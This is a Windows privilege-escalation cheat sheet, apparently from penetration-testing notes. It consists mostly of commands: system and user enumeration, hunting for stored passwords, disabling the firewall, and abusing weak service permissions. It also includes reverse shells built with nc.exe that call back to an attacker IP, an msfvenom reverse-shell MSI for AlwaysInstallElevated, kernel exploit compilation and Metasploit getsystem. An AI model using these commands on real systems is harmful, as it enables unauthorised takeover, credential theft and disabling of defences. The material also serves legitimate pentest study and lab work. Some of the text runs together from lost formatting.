Windows Privilege Escalation
- OS Info Enumeration
systeminfohostnameecho %username%wmic qfe -> check patcheswmic logicaldisk -> get other disk information
- User Enumeration
whoamiwhoami /priv -> check user privillegeswhoami /groups -> check user groupsnet user -> list all usersnet user <username> -> check groups associated with a usernet localgroup -> Check all the local groups availablenet localgroup <group name> -> List the members of the given localgroup
- Task | Service | Process Enumeration
sc queryex type= service (Lists all the service)tasklist /SVCtasklistnet startDRIVERQUERYwmic product get name, version, vendor
- Permission Enumeration
- C:\Program Files : icacls program_name
- icacls root.txt /grant <username>:F (to grant permission to access file)
- Check the PowerShell history file
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt - Check stored usernames and passwords
cmdkey /list
- Network based
ipconfigipconfig /allarp -arouter printnetstat -ano
- Password Hunting
- findstr /si password *.txt *.ini *.config (try searching in different directories)dir /s *pass* == *cred* == *vnc* == *.config*dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*where /R C:\ user.txtwhere /R C:\ *.ini
- AV / Firewall check / Service Enumeration
sc query windefend
netsh advfirewall firewall dump
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
netsh firewall show state (show firewall running or stopped)
netsh firewall show config (show firewall configuration)
netsh firewall set opmode disable # Disable firewall
- Scheduled Tasks
schtasks /query /fo LIST /v
- Mount Information
mountvol
Service Account Priv Esc (Token Impersonation)
- whoami /priv
Run As :
Use the
cmdkey to list the stored credentials on the machine.cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
Using
runas with a provided set of credential.runas /savecred /user:admin C:\PrivEsc\reverse.exe
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
Could not load image
Access check :
accesschk.exe -ucqv [service_name] /accepteulaaccesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)- Find all weak folder permissions per drive.
accesschk.exe /accepteula -uwdqs Users c:\accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
- Find all weak file permissions per drive.
accesschk.exe /accepteula -uwsv "Everyone" "C:\Program Files"accesschk.exe /accepteula -uwqs Users c:\*.*accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*
- Powershell
:
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
sc qc [service_name] // for service propertiessc query [service_name] // for service statussc config [service_name] binpath= "C:\Temp\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe"sc config [service_name] obj= ".\LocalSystem" password= ""net start [service_name]
Unquoted Service Path Privilege Escalation
- wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
C:\Temp> for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
C:\Temp> for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
C:\Temp> sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
C:\Temp> type Servicenames.txt
C:\Temp> FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
C:\Temp> FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
Always Install Elevated :
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 –f msi > install.msi
C:> msiexec /quiet /qn /i install.msi
Kernel Exploits :
- run
systeminfo| capture the output and run windows-exploit-suggester.py - Compiling Kernel Exploits :
i686-w64-mingw32-gcc exploit.c -o exploit
or for 32 bit
i686-w64-mingw32-gcc 40564.c -o 40564 -lws2_32
Could not load image
Powershell:
- powershell -ep bypass
- load powershell (only in meterpreter)
Metasploit :
getsystemrun post/multi/recon/local_exploit_suggester
Resources :
Last modified 1yr ago